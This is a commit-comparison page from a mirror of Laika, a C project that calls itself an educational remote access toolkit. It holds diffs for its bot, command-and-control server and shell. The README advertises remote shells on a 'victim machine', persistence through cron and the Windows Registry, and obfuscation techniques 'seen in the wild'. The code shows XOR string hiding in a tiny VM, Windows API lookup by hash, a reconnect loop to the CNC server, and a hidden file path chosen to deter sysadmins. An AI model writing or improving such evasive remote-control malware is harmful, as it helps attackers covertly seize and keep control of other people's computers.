mirror of
https://github.com/CPunch/Laika.git
synced 2025-10-27 16:50:06 +00:00
Compare commits
5 Commits
7ec814525c
...
main
| Author | SHA1 | Date | |
|---|---|---|---|
| 7c4a5ddc8c | |||
| 5076e4c7b9 | |||
| a1c49edda1 | |||
| 0adfdc0ace | |||
| 3316c77667 |
@@ -89,9 +89,9 @@ add_subdirectory(tools/vmboxgen)
|
||||
# compile laikalib, tools, cnc & bot
|
||||
add_subdirectory(lib)
|
||||
add_subdirectory(tools)
|
||||
add_subdirectory(bot)
|
||||
|
||||
# these subprojects don't support windows (sorry)
|
||||
add_subdirectory(bot) # windows support Soon:tm:
|
||||
if(NOT WIN32 AND (UNIX AND NOT APPLE))
|
||||
add_subdirectory(cnc)
|
||||
add_subdirectory(shell)
|
||||
|
||||
@@ -12,15 +12,16 @@ Laika is a simple cross-platform Remote Access Toolkit stack for educational pur
|
||||
Some notable features thus far:
|
||||
- [X] Lightweight, the bot alone is 183kb (`MinSizeRel`) and uses very little resources minimizing Laika's footprint.
|
||||
- [X] Authentication & packet encryption using LibSodium and a predetermined public CNC key. (generated with `bin/genKey`)
|
||||
- [X] Server and Shell configuration through `.ini` files.
|
||||
- [X] Ability to open shells remotely on the victim's machine.
|
||||
- [X] CNC and Shell configuration through `.ini` files.
|
||||
- [X] Open shells remotely on the victim machine.
|
||||
- [X] Persistence across reboot: (toggled with `-DLAIKA_PERSISTENCE=On`)
|
||||
- [X] Persistence via Cron on Linux-based systems.
|
||||
- [X] Persistence via Windows Registry.
|
||||
- [X] Uses obfuscation techniques also seen in the wild (string obfuscation, tiny VMs executing sensitive operations, etc.)
|
||||
- [ ] Simple configuration using CMake:
|
||||
- [X] Setting keypairs (`-DLAIKA_PUBKEY=? -DLAIKA_PRIVKEY=?`, etc.)
|
||||
- [ ] Obfuscation modes
|
||||
- [X] Setting keypairs (`-DLAIKA_CNC_IP=? -DLAIKA_CNC_PORT=?`, etc.)
|
||||
- [X] Enabling/Disabling Obfuscation (`-DLAIKA_OBFUSCATE=On`)
|
||||
- [ ] Obfuscation modes
|
||||
|
||||
## How do I use this?
|
||||
|
||||
|
||||
@@ -30,9 +30,6 @@ if(LAIKA_OBFUSCATE)
|
||||
add_dependencies(LaikaBot VMBoxGen)
|
||||
endif ()
|
||||
|
||||
# add the 'DEBUG' preprocessor definition if we're compiling as Debug
|
||||
target_compile_definitions(LaikaBot PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
|
||||
|
||||
# add include directory
|
||||
target_include_directories(LaikaBot PUBLIC ${BOT_INCLUDEDIR})
|
||||
|
||||
|
||||
@@ -9,8 +9,12 @@
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
/* if LAIKA_PERSISTENCE is defined, this will specify the timeout for
|
||||
retrying to connect to the CNC server */
|
||||
#define LAIKA_RETRY_CONNECT 5
|
||||
|
||||
#ifdef _WIN32
|
||||
# ifndef DEBUG
|
||||
# ifndef LAIKA_DEBUG_BUILD
|
||||
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, INT nCmdShow)
|
||||
{
|
||||
# else
|
||||
@@ -54,9 +58,9 @@ int main()
|
||||
laikaB_freeBot(bot);
|
||||
#ifdef LAIKA_PERSISTENCE
|
||||
# ifdef _WIN32
|
||||
Sleep(5000);
|
||||
Sleep(LAIKA_RETRY_CONNECT*1000);
|
||||
# else
|
||||
sleep(5);
|
||||
sleep(LAIKA_RETRY_CONNECT);
|
||||
# endif
|
||||
} while (1);
|
||||
|
||||
|
||||
@@ -13,8 +13,5 @@ file(GLOB_RECURSE CNCHEADERS ${CMAKE_CURRENT_SOURCE_DIR}/include/**.h)
|
||||
add_executable(LaikaCNC ${CNCSOURCE} ${CNCHEADERS})
|
||||
target_link_libraries(LaikaCNC PUBLIC LaikaLib)
|
||||
|
||||
# add the 'DEBUG' preprocessor definition if we're compiling as Debug
|
||||
target_compile_definitions(LaikaCNC PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
|
||||
|
||||
# add include directory
|
||||
target_include_directories(LaikaCNC PUBLIC ${CNC_INCLUDEDIR})
|
||||
|
||||
@@ -24,8 +24,8 @@ target_link_libraries(LaikaLib PUBLIC sodium)
|
||||
# make sure we're compiled *AFTER* lboxconfig.h has been generated
|
||||
add_dependencies(LaikaLib VMBoxGen)
|
||||
|
||||
# add the version definitions and the 'DEBUG' preprocessor definition if we're compiling as Debug
|
||||
target_compile_definitions(LaikaLib PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
|
||||
# add the version definitions
|
||||
target_compile_definitions(LaikaLib PUBLIC)
|
||||
|
||||
# add include directory
|
||||
target_include_directories(LaikaLib PUBLIC ${LIB_INCLUDEDIR} ${CMAKE_CURRENT_SOURCE_DIR}/libsodium/libsodium/src/libsodium/include)
|
||||
|
||||
@@ -63,13 +63,15 @@ struct sLaikaB_box
|
||||
# define LAIKA_BOX_SKID_END(ident) ((void)0) /* no-op */
|
||||
#endif
|
||||
|
||||
/* clang-format off */
|
||||
|
||||
/* ======================================[[ Laika Boxes ]]====================================== */
|
||||
|
||||
/* BOX_SKID decodes null-terminated strings using a provided xor _key. aptly named lol */
|
||||
#define LAIKA_BOX_SKID(_key) \
|
||||
{ \
|
||||
.unlockedData = {0}, /* reserved */ \
|
||||
.code = { /* stack layout: \
|
||||
.code = { /* stack layout: \
|
||||
[0] - unlockedData (ptr) \
|
||||
[1] - data (ptr) \
|
||||
[2] - key (uint8_t) \
|
||||
@@ -83,7 +85,7 @@ struct sLaikaB_box
|
||||
LAIKA_MAKE_VM_IAB(OP_WRITE, 0, 3), /* write data to unlockedData */ \
|
||||
LAIKA_MAKE_VM_IA(OP_INCPTR, 0), \
|
||||
LAIKA_MAKE_VM_IA(OP_INCPTR, 1), \
|
||||
LAIKA_MAKE_VM_IAB(OP_TESTJMP, 3, -17), /* exit loop on null terminator */ \
|
||||
LAIKA_MAKE_VM_IAB(OP_TESTJMP, 3, -17), /* exit loop on null terminator */ \
|
||||
OP_EXIT \
|
||||
} \
|
||||
}
|
||||
@@ -99,7 +101,7 @@ LAIKA_FORCEINLINE void *laikaB_unlock(struct sLaikaB_box *box, void *data)
|
||||
[LAIKA_BOX_SCRATCH_INDX] = LAIKA_MAKE_VM_PTR(box->scratch),
|
||||
[LAIKA_BOX_DATA_INDX] = LAIKA_MAKE_VM_PTR(data),
|
||||
},
|
||||
.code = {0}, /* zero initalized */
|
||||
.code = {0}, /* zero initalized */
|
||||
.stack = {0}, /* zero initalized */
|
||||
.pc = 0
|
||||
};
|
||||
@@ -116,6 +118,8 @@ LAIKA_FORCEINLINE void laikaB_lock(struct sLaikaB_box *box)
|
||||
sodium_memzero(box->scratch, LAIKA_BOX_SCRATCH_SIZE);
|
||||
}
|
||||
|
||||
/* clang-format on */
|
||||
|
||||
/* include KEY_* & DATA_* macros for each obfuscated string */
|
||||
#include "lboxconfig.h"
|
||||
|
||||
|
||||
@@ -24,10 +24,10 @@
|
||||
|
||||
/* LAIKA_ERROR(printf args):
|
||||
if called after a LAIKA_TRY block will jump to the previous LAIKA_CATCH/LAIKA_TRYEND block,
|
||||
otherwise program is exit()'d. if DEBUG is defined printf is called with passed args, else
|
||||
otherwise program is exit()'d. if LAIKA_DEBUG_BUILD is defined printf is called with passed args, else
|
||||
arguments are ignored.
|
||||
*/
|
||||
#ifndef DEBUG
|
||||
#ifndef LAIKA_DEBUG_BUILD
|
||||
# define LAIKA_ERROR(...) \
|
||||
do { \
|
||||
if (LAIKA_ISPROTECTED) \
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
#ifndef LAIKA_RSA_H
|
||||
#define LAIKA_RSA_H
|
||||
|
||||
#include "lconfig.h"
|
||||
#include "sodium.h"
|
||||
|
||||
#include <stdbool.h>
|
||||
|
||||
@@ -76,7 +76,7 @@ enum
|
||||
OP_TESTJMP, /* if stk_indx[uint8_t] != 0, pc += [int8_t] */
|
||||
|
||||
/* misc. */
|
||||
#ifdef DEBUG
|
||||
#ifdef LAIKA_DEBUG_BUILD
|
||||
OP_DEBUG
|
||||
#endif
|
||||
};
|
||||
@@ -154,7 +154,7 @@ LAIKA_FORCEINLINE void laikaV_execute(struct sLaikaV_vm *vm)
|
||||
|
||||
break;
|
||||
}
|
||||
#ifdef DEBUG
|
||||
#ifdef LAIKA_DEBUG_BUILD
|
||||
case OP_DEBUG: {
|
||||
int i;
|
||||
|
||||
|
||||
@@ -11,7 +11,7 @@
|
||||
#include <string.h>
|
||||
#include <inttypes.h>
|
||||
|
||||
#ifdef DEBUG
|
||||
#ifdef LAIKA_DEBUG_BUILD
|
||||
# define LAIKA_DEBUG(...) \
|
||||
printf("[~] " __VA_ARGS__); \
|
||||
fflush(stdout);
|
||||
|
||||
@@ -13,6 +13,7 @@
|
||||
#define LAIKA_CNC_PORT "@LAIKA_CNC_PORT@"
|
||||
|
||||
/* settings */
|
||||
#cmakedefine LAIKA_DEBUG_BUILD
|
||||
#cmakedefine LAIKA_PERSISTENCE
|
||||
#cmakedefine LAIKA_OBFUSCATE
|
||||
|
||||
@@ -20,8 +21,8 @@
|
||||
|
||||
/* =====================================[[ Linux Strings ]]===================================== */
|
||||
|
||||
/* we want a semi-random file lock that is stable between similar builds,
|
||||
* so we use the GIT_VERSION as our file lock :D */
|
||||
/* we want a semi-random file lock that is stable between similar builds,
|
||||
* so we use the GIT_VERSION as our file lock :D */
|
||||
#define LAIKA_LIN_LOCK_FILE "/tmp/" LAIKA_VERSION_COMMIT
|
||||
|
||||
/* most sysadmins probably wouldn't dare remove something named '.sys/.update' */
|
||||
@@ -32,8 +33,8 @@
|
||||
|
||||
/* ====================================[[ Windows Strings ]]==================================== */
|
||||
|
||||
/* we want a semi-random mutex that is stable between similar builds,
|
||||
* so we use the GIT_VERSION as our mutex :D */
|
||||
/* we want a semi-random mutex that is stable between similar builds,
|
||||
* so we use the GIT_VERSION as our mutex :D */
|
||||
#define LAIKA_WIN_MUTEX LAIKA_VERSION_COMMIT ".0"
|
||||
|
||||
/* looks official enough */
|
||||
|
||||
@@ -7,6 +7,7 @@
|
||||
# include <process.h>
|
||||
# include <windows.h>
|
||||
|
||||
#ifdef LAIKA_OBFUSCATE
|
||||
/* WINAPI types */
|
||||
typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, INT);
|
||||
typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, DWORD, HPCON *);
|
||||
@@ -25,6 +26,19 @@ extern _RegOpenKeyExA oRegOpenKeyExA;
|
||||
extern _RegCloseKey oRegCloseKey;
|
||||
extern _RegSetValueExA oRegSetValueExA;
|
||||
extern _RegQueryValueExA oRegQueryValueExA;
|
||||
#else
|
||||
|
||||
/* disabling obfuscation by macro magic :O */
|
||||
#define oShellExecuteA ShellExecuteA
|
||||
#define oCreatePseudoConsole CreatePseudoConsole
|
||||
#define oClosePseudoConsole ClosePseudoConsole
|
||||
#define oCreateProcessA CreateProcessA
|
||||
#define oRegOpenKeyExA RegOpenKeyExA
|
||||
#define oRegCloseKey RegCloseKey
|
||||
#define oRegSetValueExA RegSetValueExA
|
||||
#define oRegQueryValueExA RegQueryValueExA
|
||||
|
||||
#endif
|
||||
#endif
|
||||
|
||||
void laikaO_init();
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
#ifndef LAIKA_PACKET_H
|
||||
#define LAIKA_PACKET_H
|
||||
|
||||
#include "lconfig.h"
|
||||
#include <inttypes.h>
|
||||
|
||||
#define LAIKA_MAGIC "LAI\x12"
|
||||
@@ -121,7 +122,7 @@ enum
|
||||
typedef uint8_t LAIKAPKT_ID;
|
||||
typedef uint16_t LAIKAPKT_SIZE;
|
||||
|
||||
#ifdef DEBUG
|
||||
#ifdef LAIKA_DEBUG_BUILD
|
||||
const char *laikaD_getPacketName(LAIKAPKT_ID);
|
||||
#endif
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#include "net/lpacket.h"
|
||||
|
||||
#ifdef DEBUG
|
||||
#ifdef LAIKA_DEBUG_BUILD
|
||||
const char *laikaD_getPacketName(LAIKAPKT_ID id)
|
||||
{
|
||||
const char *PKTNAMES[] = {"LAIKAPKT_VARPKT",
|
||||
|
||||
@@ -137,6 +137,7 @@ _findByHashFail:
|
||||
|
||||
/* ======================================[[ Exposed API ]]====================================== */
|
||||
|
||||
#ifdef LAIKA_OBFUSCATE
|
||||
_ShellExecuteA oShellExecuteA;
|
||||
_CreatePseudoConsole oCreatePseudoConsole;
|
||||
_ClosePseudoConsole oClosePseudoConsole;
|
||||
@@ -163,4 +164,10 @@ void laikaO_init()
|
||||
oRegCloseKey = (_RegCloseKey)(findByHash("advapi32.dll", 0xae0cf309));
|
||||
oRegSetValueExA = (_RegSetValueExA)(findByHash("advapi32.dll", 0xcb91dcf7));
|
||||
oRegQueryValueExA = (_RegQueryValueExA)(findByHash("advapi32.dll", 0x4298d735));
|
||||
}
|
||||
}
|
||||
#else
|
||||
void laikaO_init()
|
||||
{
|
||||
/* stubbed!! */
|
||||
}
|
||||
#endif
|
||||
Submodule libsodium updated: a606dc79ed...f568ff02f1
@@ -13,8 +13,5 @@ file(GLOB_RECURSE SHELLHEADERS ${CMAKE_CURRENT_SOURCE_DIR}/include/**.h)
|
||||
add_executable(LaikaShell ${SHELLSOURCE} ${SHELLHEADERS})
|
||||
target_link_libraries(LaikaShell PUBLIC LaikaLib)
|
||||
|
||||
# add the 'DEBUG' preprocessor definition if we're compiling as Debug
|
||||
target_compile_definitions(LaikaShell PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
|
||||
|
||||
# add include directory
|
||||
target_include_directories(LaikaShell PUBLIC ${SHELL_INCLUDEDIR})
|
||||
|
||||
@@ -9,6 +9,3 @@ set_property(GLOBAL PROPERTY USE_FOLDERS ON)
|
||||
file(GLOB_RECURSE GENKEYSOURCE ${CMAKE_CURRENT_SOURCE_DIR}/src/**.c)
|
||||
add_executable(genKey ${GENKEYSOURCE})
|
||||
target_link_libraries(genKey PUBLIC LaikaLib)
|
||||
|
||||
# add the 'DEBUG' preprocessor definition if we're compiling as Debug
|
||||
target_compile_definitions(genKey PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
|
||||
|
||||
@@ -10,9 +10,6 @@ file(GLOB_RECURSE VMTESTSOURCE ${CMAKE_CURRENT_SOURCE_DIR}/src/**.c)
|
||||
add_executable(VMBoxGen ${VMTESTSOURCE})
|
||||
target_link_libraries(VMBoxGen PUBLIC)
|
||||
|
||||
# add the 'DEBUG' preprocessor definition if we're compiling as Debug
|
||||
target_compile_definitions(VMBoxGen PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
|
||||
|
||||
# generate the VMBOXCONFIG file
|
||||
if(LAIKA_OBFUSCATE)
|
||||
add_custom_command(TARGET VMBoxGen POST_BUILD
|
||||
|
||||
@@ -13,11 +13,12 @@
|
||||
} while (0);
|
||||
#define RANDBYTE (rand() % UINT8_MAX)
|
||||
|
||||
static const char *PREAMBLE = "/* file generated by VMBoxGen, see tools/vmboxgen/src/main.c "
|
||||
"*/\n#ifndef LAIKA_VMBOX_CONFIG_H\n#define LAIKA_VMBOX_CONFIG_H\n\n";
|
||||
static const char *PREAMBLE = "/* file generated by VMBoxGen, see tools/vmboxgen/src/main.c */\n"
|
||||
"#ifndef LAIKA_VMBOX_CONFIG_H\n"
|
||||
"#define LAIKA_VMBOX_CONFIG_H\n\n";
|
||||
static const char *POSTAMBLE = "\n#endif\n";
|
||||
|
||||
void writeArray(FILE *out, uint8_t *data, int sz)
|
||||
static void writeArray(FILE *out, uint8_t *data, int sz)
|
||||
{
|
||||
int i;
|
||||
|
||||
@@ -28,18 +29,18 @@ void writeArray(FILE *out, uint8_t *data, int sz)
|
||||
fprintf(out, "0x%02x};\n", data[sz - 1]);
|
||||
}
|
||||
|
||||
void writeDefineArray(FILE *out, char *ident, uint8_t *data)
|
||||
static void writeDefineArray(FILE *out, char *ident, uint8_t *data)
|
||||
{
|
||||
fprintf(out, "#define %s ", ident);
|
||||
writeArray(out, data, LAIKA_VM_CODESIZE);
|
||||
}
|
||||
|
||||
void writeDefineVal(FILE *out, char *ident, int data)
|
||||
static void writeDefineVal(FILE *out, char *ident, int data)
|
||||
{
|
||||
fprintf(out, "#define %s 0x%02x\n", ident, data);
|
||||
}
|
||||
|
||||
void addPadding(uint8_t *data, int start)
|
||||
static void addPadding(uint8_t *data, int start)
|
||||
{
|
||||
int i;
|
||||
|
||||
@@ -49,15 +50,15 @@ void addPadding(uint8_t *data, int start)
|
||||
}
|
||||
}
|
||||
|
||||
void makeSKIDdata(char *data, int sz, uint8_t *buff, int key)
|
||||
static void makeSKIDdata(char *data, int sz, uint8_t *buff, int key)
|
||||
{
|
||||
int i;
|
||||
|
||||
for (i = 0; i < sz; i++)
|
||||
buff[i] = data[i] ^ key;
|
||||
|
||||
buff[i++] = key; /* add the null terminator */
|
||||
addPadding(buff, i);
|
||||
buff[i++] = key; /* add the null terminator (key ^ key = 0x00) */
|
||||
addPadding(buff, i); /* fill in the remaining bytes with semi-rand padding */
|
||||
}
|
||||
|
||||
#define MAKESKIDDATA(macro) \
|
||||
@@ -69,14 +70,17 @@ void makeSKIDdata(char *data, int sz, uint8_t *buff, int key)
|
||||
int main(int argv, char **argc)
|
||||
{
|
||||
uint8_t tmpBuff[LAIKA_VM_CODESIZE];
|
||||
int key;
|
||||
FILE *out;
|
||||
char *fileName;
|
||||
int key;
|
||||
|
||||
if (argv < 2)
|
||||
ERR("USAGE: %s [OUTFILE]\n", argv > 0 ? argc[0] : "BoxGen");
|
||||
|
||||
if ((out = fopen(argc[1], "w+")) == NULL)
|
||||
ERR("Failed to open %s!\n", argc[1]);
|
||||
/* open output file */
|
||||
fileName = argc[1];
|
||||
if ((out = fopen(fileName, "w+")) == NULL)
|
||||
ERR("Failed to open %s!\n", fileName);
|
||||
|
||||
srand(time(NULL)); /* really doesn't need to be cryptographically secure, the point is only to
|
||||
slow them down */
|
||||
@@ -100,8 +104,8 @@ int main(int argv, char **argc)
|
||||
fprintf(out, POSTAMBLE);
|
||||
fclose(out);
|
||||
|
||||
printf("Wrote %s\n", argc[1]);
|
||||
printf("Laika VMBox data header dumped to '%s'\n", fileName);
|
||||
return 0;
|
||||
}
|
||||
|
||||
#undef MAKEDATA
|
||||
#undef MAKESKIDDATA
|
||||
|
||||
@@ -10,5 +10,3 @@ file(GLOB_RECURSE VMTESTSOURCE ${CMAKE_CURRENT_SOURCE_DIR}/src/**.c)
|
||||
add_executable(vmTest ${VMTESTSOURCE})
|
||||
target_link_libraries(vmTest PUBLIC LaikaLib)
|
||||
|
||||
# add the 'DEBUG' preprocessor definition if we're compiling as Debug
|
||||
target_compile_definitions(vmTest PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
|
||||
|
||||
Reference in New Issue
Block a user